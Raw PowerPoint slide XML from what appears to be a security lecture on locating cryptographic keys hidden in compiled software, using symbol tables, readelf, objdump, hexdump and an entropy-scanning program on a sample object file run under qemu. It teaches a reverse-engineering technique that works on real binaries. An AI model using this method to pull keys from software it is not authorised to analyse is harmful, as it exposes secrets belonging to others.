        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1880281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1219"/>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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="371300" y="1565563"/>
            <a:ext cx="11582400" cy="5012999"/>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First, lets look at the symbol table.</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nm find_key1.o</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>U __Z11ebc_encryptPhS_S_</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0000000000000000 T __Z7programiPhS_</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0000000000000060 D _my_key</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symbol _my_key is a tip off.  Decoding the elf file, we can track this symbol to the location in the file with the following data:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ccdb 7805 fbe4 2b50 ec79 670f 4ea9 8331</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So we found the key!  Often we don’t get that kind of tip, so we’ll need to be more clever.</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In the appendix, you’ll find a program, running_entropy.cc, that finds the byte positions in a file with largest entropy (using 4-bit grams).  When we run the program on find_key1.o, we get:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Largest entropy positions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  position: 648(288)  entropy: 02.5000</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This is exactly the location in the file, you’ll find the key!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{555716ED-0850-9A49-9863-BED37F8E81D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1710060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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="579829" y="1662545"/>
            <a:ext cx="11032342" cy="4555799"/>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Do the following to carry out the analysis on arm binaries (with qemu and the cross compiling tools)</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Compile</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arm-linux-gnueabi-g++ --static -o running_arm_entropy.exe running_entropy.cc</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arm-linux-gnueabi-gcc –c find_key1_arm.o find_key1.cc</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Look at the executable</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readelf –a running_arm_entropy.exe</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Run it under the qemu simulator</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qemu-arm running_arm_entropy.exe --in find_key1_arm.o </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="20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Lets look at that location with hexdump</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="2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hexdump find_key1_arm.o</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B69FC32-DD3A-A348-8E5E-DF2596C5E652}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4191928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4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="276124" y="1946949"/>
            <a:ext cx="11582400" cy="4162906"/>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Transcript</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34"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file find_key1_arm.o</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>find_key1_arm.o: ELF 32-bit LSB relocatable, ARM, EABI5 version 1 (SYSV), not stripped</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>arm-linux-gnueabi-objdump --disassemble-all find_key1_arm.o &gt;&gt;xx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>find_key1_arm.o:     file format elf32-littlearm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000000 &lt;_Z7programiPhS_&gt;:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   0:   e92d4800        push    {fp, lr}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   4:   e28db004        add     fp, sp, #4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   8:   e24dd010        sub     sp, sp, #16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   … …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  64:   e8bd8800        pop     {fp, pc}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  68:   00000000        andeq   r0, r0, r0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>readelf –a find_key1_arm.o </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34"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3B69FC32-DD3A-A348-8E5E-DF2596C5E652}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2522415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5856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5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1378376"/>
            <a:ext cx="11582400" cy="5144232"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ELF Header:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  Magic:   7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  Class:                             ELF32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  Data:                              2's complement, little endian</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  Flags:                             0x5000000, Version5 EABI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  Number of section headers:         15</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  Section header string table index: 14</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Section Headers:</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[Nr] Name         Type        Addr     Off    Size   ES Flg Lk Inf Al</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[ 0]              NULL        00000000 000000 000000 00      0   0  0</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[ 1] .text        PROGBITS    00000000 000034 00006c 00  AX  0   0  4</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[ 2] .rel.text    REL         00000000 0002ec 000010 08   I 12   1  4</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[ 3] .data        PROGBITS    00000000 0000a0 000010 00  WA  0   0  4  &lt;--- my_key is here</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3B69FC32-DD3A-A348-8E5E-DF2596C5E652}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="262801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6</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="982345"/>
            <a:ext cx="11582400" cy="5144232"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1920"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ELF Header:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1920"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  Magic:   7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1920"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  Class:                             ELF32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1920"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  Data:                              2's complement, little endian</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1920"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1920"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  Flags:                             0x5000000, Version5 EABI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1920"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1920"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  Number of section headers:         15</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1920"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  Section header string table index: 14</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1920"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Section Headers:</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[Nr] Name         Type        Addr     Off    Size   ES Flg Lk Inf Al</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[ 0]              NULL        00000000 000000 000000 00      0   0  0</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[ 1] .text        PROGBITS    00000000 000034 00006c 00  AX  0   0  4</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[ 2] .rel.text    REL         00000000 0002ec 000010 08   I 12   1  4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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  [ 3] .data        PROGBITS    00000000 0000a0 000010 00  WA  0   0  4  &lt;--- my_key is here</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>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3B69FC32-DD3A-A348-8E5E-DF2596C5E652}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2279359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keys in software, 7</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333476" y="1601584"/>
            <a:ext cx="11582400" cy="5144232"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>qemu-arm-static running_arm_entropy.exe --in find_key1_arm.o</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>at --in: find_key1_arm.o</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>File: find_key1_arm.o, 4 bit multigrams, span: 16 bytes</a:t>
            </a:r>
          </a:p>
